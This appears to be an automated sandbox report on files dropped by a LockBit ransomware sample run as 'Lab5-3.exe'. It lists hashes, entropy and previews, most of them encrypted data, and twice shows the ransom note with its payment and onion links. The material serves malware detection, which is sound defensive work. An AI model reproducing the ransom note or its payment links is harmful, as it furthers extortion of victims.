                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):10352
                                                                                                          Entropy (8bit):7.9833236825635625
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:192:pmfV893pX6ftPl4PLQd/JjQ56tPgLns81eCWR9RMyzIfNEofWVi0Cb:pmfg6DGQfq6tKU9RMyzYNdWitb
                                                                                                          MD5:C18BBE62C75F0786CEE391E6D3D79C3A
                                                                                                          SHA1:D68C257BE61D96FF7BF6FD7716D0129EF33C141F
                                                                                                          SHA-256:06B7D31D61844F9611343C300A49399E1F3A7F2EE44A7C794199254F22BC9554
                                                                                                          SHA-512:2DB15D070587E26E66638406B5AFE6783141BD7274789325E6EC9B039CF7305B0F3A6EE66D0A3242DDB52E9838FC29E9F101BD30EFB9C2D6FF01D5B2C8C87E95
                                                                                                          Malicious:false
                                                                                                          Preview:..7.9..(.q......JS..6TY.......+..j;...H..8!n.....:~....%..CG.J.K.dS.p|:.3.N....>.......5Am.......X..,.(.D.Q.Um.a..l....CKK.<\..........).h.z..l%.....6.jwm...oN?.O............#....y.l....h.....O6._A...|~Z.`9~-....s..tTX...^...S..Ut..a.K.8.2.....g..2.....5{.T3..".a)..Q~..*...+...@...[,.LZ......b.MF^..h-Q....Cs...*...t.8.v;..`.~.....ff..o|.o.H....m...~3.@V}....F&.-......J..9 .)...T..m....:..*......6.h.t...h....(..V.I....F.P.1..69 f.i7......Dx........X.Nt3..)..%...(z;6.K.....8.%.2......[.E.....h...E..7..?I=.&.+_m..Z..<..;H.....7.....5.|..F.......+....y..d.v.qq.xlC...F9Z.p.K. GP...Fp....k#@.....c\.:..j...X....i.2.y..4....d.s.@...}.Sm......D....9...yO]..lP.VzabF....].S.i..k...~...]TG.x.A...^..F.$. .Z..z..M_`X._..i...8....8..H....u...v......~Ef..r.:..A..+^5...".b.#...W...tN).....s3 .,....{|...q...y......[2..0...f.\.Q.h.h..B...z^..@....R..X.5oe...}S..!..{..g .!......F|\.#...N....8..........*.pu..P.:..q...z......#/..7#........5.....W,....Og
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):21376
                                                                                                          Entropy (8bit):7.992175287746577
                                                                                                          Encrypted:true
                                                                                                          SSDEEP:384:7nMWsJpjY/mFVFchDeKvVADKvbW6F4JC8HRaIMhs+OpZ3s1tb:bzsJpj8oVIDTKD8W6FWHJMhs+S3s1Z
                                                                                                          MD5:551FCE86FF7EC729FBEFFB37D6F07973
                                                                                                          SHA1:FDB24ADF92F6F18C674B5E1A76AB4F3D93420DD5
                                                                                                          SHA-256:31175BB427734FD7F7863E7CC734B2B0E2569394E6277DBAF1DB9A79021918ED
                                                                                                          SHA-512:995128CD6F0F9E4122DA6B58F1560F24C63AFB45EFFEC2BED4350ED6AB625E3502441BD809E96970303D155E7FCAC42D07DD18864D0FBC4D999115FAC2CF9A8B
                                                                                                          Malicious:true
                                                                                                          Preview:.5..~.?8t.#+...I.......{ !.m...L....g.@.,.qf.+....f..k7MIH.....#.y......j..........:._,.=.q....M.!.*.>..\Rg.s......v.H.bv.]...........F....a._..@..l..8...q..3&..J.[w.tu.....`c.p.P./...s...}~.<L.7....wO_d..^.NT..i......vQ.....dM.,.wI0.....L...k...N.`,#+.....{......x.[....]s...^]..x...}2....p.....09..*...t..5..sq.T.fUH../_!. _..1.t.....C.....L.B..i /{..Aq..1zV.....V...4g.6&....;.d`]G.e.S.8..D....d$......g.b...]....M...........GB<6^x..[NM#..:..".._.....fZ.....N.2.Om.../.k.w.....K5H%.D.*N.....{.K..&..xvd..d.....X.._..Us6....N*.z..._...:a.B....w......6..Z.6../ ....&|LE%XU.....,.C}.F.g%...`..[\.....B.!.wg.......s.}.!.. .g.AYo..OL....`.....N..m.t.wo...{..009...uO#.....Wh..JaVE.......Q,.R.....$X.o.....z.vl....o.......ngU(.8+]/.O....~M,...w5..iUeP.-[...^....-.........;...2Cu...<.A.$Q.%F....U.n....MX..z-G..j.........2.Z..>..KT$.....%<a..@....Y.......s.!.\*.J.5.2d...N./.\>.......&k...^v.!JL.B>#u...-..|...&......'..."Hb..;._......1..O.N....T."/.k
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):9936
                                                                                                          Entropy (8bit):7.979298436035953
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:192:UZ3qyXbEWjniDHmrYFjLETdr0+Qfrhkvfl0Cb:OqUb7w1/EXUkvdtb
                                                                                                          MD5:C11CB2096ADCB8E3C9F3DA517758090C
                                                                                                          SHA1:DF21610C8333D5F67A0E01BE4700287D5D01B5E7
                                                                                                          SHA-256:9975E0958FB17CE0C697AE9C3A1A16AE57626CB701B0CBF9F2565C9DA2D02552
                                                                                                          SHA-512:76677319B22C9EFF5D1F1C3CE3BEE801105D33544456A2E56E1EA555DEE8CFAD0FCFB533AB633CD85A0D5BBD3BFABD891B1FEE8C502EE9C8F4EEBBC700E676C7
                                                                                                          Malicious:false
                                                                                                          Preview:..JY1[%.....l...3.k:......0...............fB.s.Q.SZ...g..k.GhR..,N.h.,...f.=......E....tMg"..+>8.*.........$..d9.u.Jp.V.....j.E.X.}7I:.VS9.#..G5.5.|Sy.@bX.@".rPj..i..|......,..mI#.A.....4P.b3m._....\.VZ......Q<i............l.....7...3.,..+fo..h....n.N.q.-.....X......!..?....P.*...^*=AY0hM..`Fdd...k..3}=..C..)....Xi..#....'......i....Yd.[.a.%u.p..$.V1.;......U.7N...e..qf.\.0...g..*..O.}...V94..h..XBd....e.X.&...:.Vm6.&5>.,(.U.2..+....iT#...v......T*2qLF..Y.&o....{..lN.h.....l.B6.y..r..O|xF^..G.c=..,....v...z.....1.{.......n+.B..w)L.......{*..E..l......x.u...n..7........5....iF....)yr.\.0......'.......\.C.....R.h?*j.;L.u.g....+.... ..!p.h..u.A..q..8.Z.R..N..I.YTZ.i.g....m.L,......_2...*.] .2...3.&e\S.l.b3c._...m.Lcz..........#...L.v[M8[Z4.;..1...lp.......o%.7.........7.>.([(.V.O|.X.<q..\<.0..\....+;..*..Q. H.....U.....1..z.Z...j*..a...V....'*.\.{s..B23......e>V.T.......P...w..u.I.e...1K.......%...Q.....U..2.Q..G.9..D.......m...b-.d.
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:ASCII text, with CRLF line terminators
                                                                                                          Category:dropped
                                                                                                          Size (bytes):1281
                                                                                                          Entropy (8bit):5.0109143188305945
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:24:hXtdFjtPuy1DK6vh88waN7LnNvhv6M9wDKvDtrCAuVcHdBUi:hXltG76vDnNvs0LMAuyH1
                                                                                                          MD5:AD01B46BC788640E0B348FFCEAD87439
                                                                                                          SHA1:0663F726C339E9C5D0EEC46D274C7C2456843C01
                                                                                                          SHA-256:234AAED071BF79A99676C06B51F1D98432AD7C143C604EDC16664490EBF22E96
                                                                                                          SHA-512:B49EC5246753A9F857278235BEEA0A84667AF5DBCC8FA1295807F6D9248E0920EE45584DDDED739036C965C055AF2A67A8E435E502CF9C5115E0F913EA897F09
                                                                                                          Malicious:false
                                                                                                          Preview:All your important files are encrypted!..Any attempts to restore your files with the thrid-party software will be fatal for your files!..RESTORE YOU DATA POSIBLE ONLY BUYING private key from us...There is only one way to get your files back:....1) Through a standard browser(FireFox, Chrome, Edge, Opera)..| 1. Open link http://lockbit-decryptor.top/?BC76D224712A7481BC6E90ACB6D18E50..| 2. Follow the instructions on this page......2) Through a Tor Browser - recommended..| 1. Download Tor browser - https://www.torproject.org/ and install it...| 2. Open link in TOR browser - http://lockbitks2tvnmwk.onion/?BC76D224712A7481BC6E90ACB6D18E50... This link only works in Tor Browser! ..| 3. Follow the instructions on this page...... ### Attention! ###.. # lockbit-decryptor.top may be blocked. We recommend using a Tor browser to access the site.. # Do not rename encrypted files... # Do not try to decrypt using third party software, it may cause permanent data loss... # Decryption of your files wit
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):1744
                                                                                                          Entropy (8bit):7.896134942912908
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:48:uulinOD80HfUTid3hBaUoSGFcmeykEdEElU92i:uulinLGx0uKeY2ElUJ
                                                                                                          MD5:981CF7730B4ABFD2B1235892DED7E35C
                                                                                                          SHA1:170FAC53072178DB672213CCB8A072D2A5C7FF44
                                                                                                          SHA-256:7D402BAFC0CA11223E71A84057AF3732C3481C0A802F62EF3FAA6AC8B50FEC05
                                                                                                          SHA-512:B562CE534D583EE55F9CC24DD6CB2D7C198CF392D37A6958C2C10CAC0A87E1E1F1764DBD915A997C451C2982E35037A5C7DF4D2CEC0E59F1D4CC67213CBF5B7C
                                                                                                          Malicious:false
                                                                                                          Preview:.F.T..A..u...Y..5...a LOE......f:....j...3&.y...H.r..8.-............#n.....\{.WY.t.w.....E.-.b.&.L.o..C.KP.0..=.VuT..w^=.C)f+.B\}..@bz0.$ '...7..-.-...V{K:...SX.F9..i.).e.;..+.Sl..M..%..K...f....o.Kdvv..IcV-.A..T...y.Tc)....>......%.i*....Q".S..`..........^.cP#.......>...!y...r.w&.wN`...d...x.".UC(..9.,.V&..[.;.I..Y...Z..N..z.D...{.t..%...'......$..H.]..E./.%.........Pxgo..k...\.L#....).+.6.~.D\.P<{l.......m'...5,.*F.z..^.Q...rp....;....M....R...=(..(ch.s:........Q.V6g..>L.D.j.V.....;.$....h<P.p.....z.,r..8^P../.Hx.F...04.Ov.0&>.5P...t.,......y.....5..y3./eT..1...g....LQ.D.%Jn{...&.}...m.Y]da..........u.....r.D........<.F...`iY.+k...P..k.-.*.....67.I.,g.._Uk.h..Z........app.......B|.9.....&..H~..T.6..?....[.~....O_2....,..H0B.Y;..6..6.z"...E.;...Q.,./..........5..O.^.]..f3!...}...{....QL...>;E...1.C...).c.......(...C..BB#.\.L..WH..:..A...;..8V).....\..9....7$l/......@...3.o..7~...{.1..jD!'......9.nz.6o.....=...?...p......X...#.
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):2256
                                                                                                          Entropy (8bit):7.9198500351708345
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:48:tK4cWvZx5BFLxLyD63HfUTid3hBaUoSGFcmeykEdEElU92i:Q4cwTLFLxLyucGx0uKeY2ElUJ
                                                                                                          MD5:F2AD3916CC692785C3BF41EC9E9B1B06
                                                                                                          SHA1:12D2900E6E1FE5FC5480193FB681982CAB1951D7
                                                                                                          SHA-256:751C5A4C226B9E37E26CE6F5AB53A8A76D531A10BE3771D9FF97336AD83515D0
                                                                                                          SHA-512:08AA96FE28D735F3DFB09E38D3F19DD740A0F86DEE5D7B2333868348F55D9A292A4D4B28E9CA004E7D546B3F06F6847FFADADE4DFF386F4ADDA9050B908AEA90
                                                                                                          Malicious:false
                                                                                                          Preview:.d.............aPT..f... ..e.p..z.....k.6]....*.1.?.z.7.^x.k[}....9.u.s.9;xb..:..K.......N..|.mt.....ch.P.>.{......?h...WF-...L.]X.....R13_.6.k....O....Pv=......w.........#.j.".(...pM3...i..:.gY....(_.........!..T....K.($....z....R..N5..Q...%.SY.x.c......P..N.U!..l......J@O._..N.p.$N.-fo.%d~@v{. \...s)..........%K..$....,.......*..F..bu+.N......Bl....!..tn ....._.Ol...H.q..BEBn..Y...&!....*/.G7......;..Z]....{i.|w.@.........C.......U..w...q..u15$..j2ty.4]....J.....S.g6...2..s.u...>.V.D.@.......V4..8.}....k..M+gF..+.........f.*+.w.oT...F....x..nIq.."..W....K...A..0..'4q.{36.../..!...sg....9.g......W......n....K.....u..wbS..2.!:.>..pG..6.j+T.z...%..|V......"b..?J.s..).l.#Y... .....0.#...k........i.k..^.j(;.2F..3..m.v.C.^.).Q...M...x../..}.>...|..$p........Yv.....xd..$.*..NS.......SKe...b.y.A.b.......4.;/>..#O....p+I..(k.....i.V`Gq@B.l<.H...[...j.v.c..-..2:...V..1;.Gd?.P..V...r......_...2W.A..^.Q...rp....;....M....R...=(..(ch
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):9616
                                                                                                          Entropy (8bit):7.978377828318547
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:192:2dEvRRhyVuMlmjX8r3FXKtqAHHFUiQuG5/nmg0Cb:2S0ML8BXKcM3Quwugtb
                                                                                                          MD5:A7F0AA904159B2F2EDB55252473F3A67
                                                                                                          SHA1:E1C766AF0D1514C677256B33560B3568493B3BA8
                                                                                                          SHA-256:68BEDD50E0B7DF66A3FBE19CF3F0A92CA871C3C388F23ECDC8C9B42A1AE26595
                                                                                                          SHA-512:6F341CBD99D87A23DC9F6E111D984B6A2103122EAB14AB3255BFF4691ADBEDE681D3128C632434B48E8C82F8940C0D4755FE135577F114C63AD1D814F869EEF7
                                                                                                          Malicious:false
                                                                                                          Preview:J...?a.....w.9......kB"K..1.P. ..9..K..<{.s.n7N.......w,-g,..2..@z<..C..XY@C...[...U6..@3N.q4....$C?.S.P..$....r2}.f2....v....1..6.....I...@......3.o......9m...?dL.P...q...b'E.....5-m..c.".............4...2q...0{-'b..(..**....R&....?/..N..9.NK(=........S..Mp..lQ.0..hS.wg.B>...R....n.]..).q..O........x.@.~h...]......e....[0..J...e...P..X..tR.......[.l...jG..\,y..k. 1.J].9b.?..v.T'9.......l.!5.KK. 5.r.!.~71..<.xM.D(.s..."d.....rs.......p.={..{..`....l_ A...E.:..E....?3.......^}_;(.|.........?.5../%5...$.i;.6),.q.ilD6......c.g^..K...P.%f...9be....be. ..n.>.?_..;i.it_R...r4.!.4A..P..]|.dB..7.ci8.............d.-..D%{.'.4.S...4.B.1...c.._....8....+w...'..P.;..9.M..lM.P.F......E...0v.b....G.(......R...@....V.n.Y...m:.....?.....^x.(..5.}...b.(.. .y`.V..\zA. ).{^.&$......!4....S. t6..[..~......7rCo...LMf..P..l..I|.............9.7..MK............k".tu.......T......-...jF`.O|..LR..c.......>....c.6.>C....{f..#.t....Z..>&0H...(bT.._<.0/Y`..<....
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):9712
                                                                                                          Entropy (8bit):7.978573980375015
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:192:SDd9lAGV1NRAQpnUlJS0yRs9c35y0+ev7gb/EzN+o6Ln3LX0Cb:W7lAu0JS0pq354Xb/EzNcnrtb
                                                                                                          MD5:37797DAD3D0BA6BD679D66BD41EB2161
                                                                                                          SHA1:E650D290AFCF98ACBA9F6C0B2B0F50F62684AEA0
                                                                                                          SHA-256:8D89DE89EBD45A60A1ADD9DACFF71F17A883FC4C2BCD1CC9A09F853F67FFDB27
                                                                                                          SHA-512:30087FE558B07F46BD439C280068975181D80C7A493932B60A667F05F0BEA834DEECA71F7673DD4DB95A6DD93FE103C2031AF37E0FAC089799D94B2337E3D1D1
                                                                                                          Malicious:false
                                                                                                          Preview:.W..<.$.+;j[...i...C.ht..G'......M..{..eSQ.`.....I..z.(.k........B.....IZ.6/...n....Q..Z.{...X#.A..6.t.O'.1.....R{ ..N...`2^.o..\/.<..@..L4....E..?. .....<WZ..3...&...!rX.3e.....o2............l.M..{...[>..}.O3..:.*L...$.8.bHX.-).D..".....O.6.I.D...j....._:'..Y`c7...<..n..8K.}.hS...........5.....s...X.......Q?..kB......A..g0....Q.....P0y?...y\.+LG.y..?f..&.Sf,S.F....+.....5.&+...!...../....,...y..G.W2....A2......!...b..M.|@..V.?5..|....o\..fkH...}]._I!.....<.=.=...........$H..'...e.....X,._$..o:..]..N.~.et\r..... .n.2(...G....g].:.Q..qn.a5..B.|..gn..sspp.)n<.)Ig..l..`\.....ob5p.#.O..'..W..b......y.....:..5A.5 .#b....<.i.,.;.aw.,g...3..G.F...... .x1I}t.7(...Eo.c....8.E9..X......K6..@Y...080?&'F..U....Q1..........5}........XV.x...~9.O.9m....N^...Qj..4.J..A..0._.Aw..v.Z/.....(p...U.....nBt>D.-.=....^.5{.V`..(..zo(`.@~...N..y.Iu^*.Y.=qZn.Y.*.4.=n<(,....o.'..c.]a[..u..:T3.:..P.C....-.,C.1Q...HMIb(.=O........L.zkY.P....)_..e .T.. ..l.
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):17024
                                                                                                          Entropy (8bit):7.987385584694083
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:384:S18gnnKaUxLUAREOP22Q9tPeBpwSfO5g1pgAtb:S1vnKaKEOP2F9debwkw8pgAZ
                                                                                                          MD5:B5B90E1EE118D7058EC4DD2A931B5288
                                                                                                          SHA1:ADE2BFA7A2A86AA7F6C73C6F5C6F45B6AF633354
                                                                                                          SHA-256:7821791FDA202422EA65B0D82F598EC13FC8C67B98E2C1F47A8998643DEDAD2C
                                                                                                          SHA-512:6B67E752FAABC78EF920915743AAD30F17B6CBD4CF7FE0B11158465B1C6AC1F5E4AC5C2E2F09447D27CFCCDF9DC03656AB31D336D0E5369500648863D28DB577
                                                                                                          Malicious:false
                                                                                                          Preview:n....(./.o.{... .C..K.....H.+.b.z.. .f.....N......G.}.r.w..h..Gx._.6R.x).....:=......L....0...;..s.I...|..x.0i.k..Lc.*..]..]... ..[`....h...%VMv.a%.\..?8..an..A.SA.<b....5....V.Q...Z!]z.d .L(.J..Ql...9.yV-...R.....p..Q..zT.`.J.f=.L.t2..A.....W$.z-...T......|....`..$pP.........tMt. XZ.w.@L........p..dg...e......Y..CT.K(...<...#....m.....Z6......U.>.;.K..5/.D.t.pL....s)]........q .....$4../..'<..."..5zWb.!......l.........v......&K&b.....o.X.Q....>..s.........<j.4...g.(..E...6...9...../.I........x.....6..n_...BA.d.V....%...4....1.!Rx..;..../|.._..8..[.....'....R..d......R.P.8.....r..s|c..M....K...]m.2..o.7m.?.=....,.....Q..<Y..0uH. ./$..|ZKr..0.:.F*^8......s...d...OZ..7z......Y.....7...5...5...Js.'E..-......rF6.<C7YI1..z&p.-I...D..-....8...IE...#.b.:....S.B'.........*...f....a....Il.2.4......02.,....\..d.R....;..-........~.x-.N......g....f..,]W.`V ..........a.."z.s"..b.....6.F...8...N....^_..)..B4...l....V(&........0@.|...nB.G8#...5..$#
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):3600
                                                                                                          Entropy (8bit):7.950529365382325
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:96:XBeAuR+ho0UCmsKMVBNwgqGx0uKeY2ElUJ:ruR+ho03mCVV50Cb
                                                                                                          MD5:F32FC0DC2C2080E09A828E83B6E87C9E
                                                                                                          SHA1:F5B1CC12FD0143C692B0D943EC20D91EE00B69BD
                                                                                                          SHA-256:4B095A73363A27D4BEDA727CF11DFB3ACE645EEEB3888AB40A78EF1098294D40
                                                                                                          SHA-512:9969C04539D17616B7F2AEF84D24A3675A0A833A3F3BD6808404216E91FB939B7E03229CE534E5B3ED27FCCB6AACE081EAFC220741C0D9C0A742B62EADEB6317
                                                                                                          Malicious:false
                                                                                                          Preview:<B.b.4...[.\"..Na.Ul$..-........rp%....a.8. .xz....a...........+......R....1....IHP.B.R..B..~h..?...c..m.kle...../]x.0.C..O..E.{..[.^03.cF.T......g.~...Q..,..!..w..[.r.T[.;..U..Dz.p.;I..Br.7.,.....EV...\.K.$m..9K....<...!..5...E)&~L..]..>..EY.....M..Q..wM(;S^.p.....X2..fRy...L..XCJ...#.<Y\...Y..B...>%K1....pq..(.-...k.>......7.tH.Bs.4[.,t..h../...xH'..Y.~.T`.....b.TpF..........m2_.Q6.t.K...>.....|1z"E...D..p./ "...JKO..^.6..n.... ....@.:=d$...X.....J.`...Z(.......7...k.J.x..k.CApy...kv..jI...Hx[....;...)c..D.....Z..m..*..A.|....!..oz....?..S.+....z-.;..W......y.;...G..v..\.E....T..w....c..g9.D..I.......j4.|.....$.r.....I...Pe}YB..{...2_.W.vf..<(.....3.-.6).J..6.K..T)9..,.r..`.%....XM.........#..R.d.....dL.0{..G.u..I..1C].cr..0.V. ..mf.....`}...CK...yY*IluI\..m..2......M..........,#T..."c.&Ib.P....M.fU.......r.z"..tk..P..$$...N...`.^.`RY.M.|./7....r.A...r1....k......]....&.....I.F........s....aG....U.f..J=.P.q...!.........F..X.($1.33vua.....xE~...
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):3536
                                                                                                          Entropy (8bit):7.94934538661095
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:96:20AJ4gHLhAE2Jmo3cJe4GsGx0uKeY2ElUJ:YDqE2N3ck4Gf0Cb
                                                                                                          MD5:0FCAA9BD9C832DCFF85ED90C7DEB88BA
                                                                                                          SHA1:858E28A1D4C7844D3FC74EC49B9F49FA9C02EA56
                                                                                                          SHA-256:09ED44880EFA296F6F30BA7325903A5DDF8CAC47E90BB0F6CB30BAF938162E7C
                                                                                                          SHA-512:7E9F0D0BB4405652F4E6DC57FDC93ED9251C0BAA1B6FEA9619278F6E7167927501EE423BE60B5478E7279A88691C7D0025F22A4C29E432D361E2CE446884B6FF
                                                                                                          Malicious:false
                                                                                                          Preview:3.&.4x>>&...3.FZ....\d.wF....TQu...c.2..j\.YCC.k.Ad..3..]b.fd..l....E~...{`Y..b.."..(...z....\6k...{P.{....2I0[.4.@2..>....*...Z..4nIa6.iu..R..W..7<9.U....[A.IMq..:..m...o.v.4{..;|7.8.J..F....|.8..X.....-.w@g._...@...,.q.u..%.d..C...y..k.".1x.....(l....F.`..Q....:..?&.)$....px:.(...ME.g..........f.W&..K..'.J.S..kw...^.m.....(P........D.J.y.Z.CP\Y..6.R.? u.q..[..S..[S.A..:...d....".1...a.l..wp...c|..|.V..........A/{.&B.%..y.....9_o.).9UT..cr&.!\.%]L....3...q..:...~.Q.k..R.I.Bi.c.4'.Mn.`?3X...7*.@.J..m....U.a.B\..Z.KCL.r...R.Q.E..v.l)..v....... ..'I.....hmA....Z9...........`.Qn.#.........bH..-...3....@....!.3`..<x.. . ...&......i..L.@$..+....j..V..Gk........*...U..i.h..z*"k .I..[..o...}..].w.|?..:|T!...Vk..YS.d.g%...^.x......4f.gk.. ..J....t...x..A....i...izo.tv.6..b+.m...&g..h..v.u...c.x...0@.{.-....N.....[..]....k..&.....^..?..b.;~..i.vQ,...v...\n... ..#V..G...Mm._+...d.l...o..2.......]~o.9.m;.(.W..e..@2x.....#YS.x..j...;e...L..
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):3440
                                                                                                          Entropy (8bit):7.948342124418072
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:96:kMHxDHWsNbp+qEF4OzaWUSEOKxqJ6oaHQGcLxGx0uKeY2ElUJ:lRD2S1mF4DWUSlZzXK0Cb
                                                                                                          MD5:FFA5441DA848C826260AB9E8F79D74E2
                                                                                                          SHA1:436F83CDDA8DD19A064899B2E2AB304C78CC735F
                                                                                                          SHA-256:C118307498FA71E7605A9377D16C9236796F22B36DDDA016DC7CA834FF71823A
                                                                                                          SHA-512:BF55B5352115151AD18DB6470DF066109A42B3D2CB79F9B07211123BC1DB38A1587E7A6BAE23D27A055BDC9D768BA58414611FFC740FA879FED1D8FC0B9406C2
                                                                                                          Malicious:false
                                                                                                          Preview:...U.X@Z7.....m.*...c.n.m:F....@}.9..0NJ.T@..T.=.T.Q..a..%q..1....-=.E...`.Z5wFi.....Q{.b.!C...../......e../....^2pj..............J+.......~....[,XBM..G....G...Y..G<...r"..^...K|..&6...1=...GI.(...+D...x..r.r}...+.B.\...[..7......_._._.......f.?..s..l.r....D...k...)...B...@.!.%.A..(%+n"!~.]....=03..[..`...,`.....3.U....n...c..K@...A4..GK....{Js....m../....ds..x}$...^%...U..fm..|.p.n^.]H..#....6.x.p@..w$&_s#q.......(...U.._.n.\ .....U*jvd........g..WZ.......K..........Iu....Y#SFFd...p.......-.B.>J....:.+.G.5E..U.9.....t..UXmg..i...X..iul.V$x..7..|.Z.+..A.....*..QVbu...qR.%....`....B....?..D.~.3*.QT........%.b..c..(..9..o-q.R.`..n..$'.y....c.....t..~..A......m..&.h .........v.'..M.P..<..6..^......9....F...J.Prfm.d..i?..I...N..+..e.I....F=R.....%.......C..$2.b.4T..........x-....\..}W..d..X.a.8Ts.........8o.-...K.j<d.j..M.....P.._N.......|...]..R.D.y<|%_.p..|..:m.sI.a3X5.Z...`..R+.V..M...wc1.=...Z}.`..&.p.H.\.....{v#X -...w...SNb..{.....
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:ASCII text, with CRLF line terminators
                                                                                                          Category:dropped
                                                                                                          Size (bytes):1281
                                                                                                          Entropy (8bit):5.0109143188305945
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:24:hXtdFjtPuy1DK6vh88waN7LnNvhv6M9wDKvDtrCAuVcHdBUi:hXltG76vDnNvs0LMAuyH1
                                                                                                          MD5:AD01B46BC788640E0B348FFCEAD87439
                                                                                                          SHA1:0663F726C339E9C5D0EEC46D274C7C2456843C01
                                                                                                          SHA-256:234AAED071BF79A99676C06B51F1D98432AD7C143C604EDC16664490EBF22E96
                                                                                                          SHA-512:B49EC5246753A9F857278235BEEA0A84667AF5DBCC8FA1295807F6D9248E0920EE45584DDDED739036C965C055AF2A67A8E435E502CF9C5115E0F913EA897F09
                                                                                                          Malicious:false
                                                                                                          Preview:All your important files are encrypted!..Any attempts to restore your files with the thrid-party software will be fatal for your files!..RESTORE YOU DATA POSIBLE ONLY BUYING private key from us...There is only one way to get your files back:....1) Through a standard browser(FireFox, Chrome, Edge, Opera)..| 1. Open link http://lockbit-decryptor.top/?BC76D224712A7481BC6E90ACB6D18E50..| 2. Follow the instructions on this page......2) Through a Tor Browser - recommended..| 1. Download Tor browser - https://www.torproject.org/ and install it...| 2. Open link in TOR browser - http://lockbitks2tvnmwk.onion/?BC76D224712A7481BC6E90ACB6D18E50... This link only works in Tor Browser! ..| 3. Follow the instructions on this page...... ### Attention! ###.. # lockbit-decryptor.top may be blocked. We recommend using a Tor browser to access the site.. # Do not rename encrypted files... # Do not try to decrypt using third party software, it may cause permanent data loss... # Decryption of your files wit
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):105984
                                                                                                          Entropy (8bit):7.998447817469001
                                                                                                          Encrypted:true
                                                                                                          SSDEEP:3072:oF7deXo+jBEIcKonCO2BJx0A6OBmFRySHS5rBZ:oYeILod2/6ZvHCBZ
                                                                                                          MD5:38EDB1BF787D22F3FF65C0B99585517D
                                                                                                          SHA1:6C8D79A161C0C40E370F78B89CE1618FFF32508D
                                                                                                          SHA-256:51835669E0B7F0A0D4A098D25ED31481F61D242391CC53F907831FEB86FAEE53
                                                                                                          SHA-512:529B8167B844752687BF0D394FB355EB0D45FAB4BDEC5CA5D4762757E7DDE656DD5C1B5EB60D8030F2F71785C718DFE2589EED0E20EB8E7795142B2719428624
                                                                                                          Malicious:true
                                                                                                          Preview:m.....bk.g..CS...K@.%..r..,.xX..F......|..a.".yq..g..._.x.....#={.]..%.q.h.3.iM..'.o.F..Wz.E4V.y....I...B..XJZ<..X..-..U...@0^@..*.z.!.YS@...Hs..t...vT...E..t......Q.:r. +o....-%~}.j)..O6a.8.....-...+...."R.R......t.89.......8.y7X.yLG..x..Nw.8.yL..$.5.....}....r.~... b.P.e.>.W.5.N.D....%b.N.Ub..u.w.&..q..$t.-`...C=..H....1..B.@.Tf99.\...X..vOo.ma....GQO&Z...s..X.v........^..T..0G>.a.[Q..Q.4.....y............ ..>;....P..CA.I2.w.\..g...4.^..KL.F!.T...Na....E<d....d.$.4..6.v....uv.....D.J.2..:N...'.=yBH.../ ..J.~]w.]..O...}@..Rd~....!.Yn...1.....X....h.......z..Wa*....\...G....).L..9..#y..aK...$l?`.G}.l.&.......jK\...?....(YE.ul...}f.\...1.[.Uk,.9%..)..0B.S..gV.rk.)..1..bZ.fx=|>.K.]t.>|.4}.v....Dws..4.L.[q.S".*6...t.AN.B0.;...h{..S..|./|{3_.....+.&.p.....Qy.......t.Kg.lVY.`V.>.M.h.c7e|u...]....~]..-.d....r....K.W...k.8G...~.%..Hz.......F.)....\F..I\G^.qQ.:4..v.=Bt..5.)r.C..|.T....-wk.....g...4...A*i{....]%.:....9.y....}U.)h*z.b.etN. .
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):3632
                                                                                                          Entropy (8bit):7.953574828898774
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:96:knXHUWbA5f2J67z6a3iGfcGTGx0uKeY2ElUJ:gXUWbAF37GnGE10Cb
                                                                                                          MD5:39A72A0B0C46AAF3DFC2EEBE9685F4A2
                                                                                                          SHA1:10BE4BC95AC1EDDC4E461FD13C3D6EC8680C30B5
                                                                                                          SHA-256:A6D161F04174CCB844CFCD6C249D46178C1F36C67BAF30E0DB57F9E1E8BF14E0
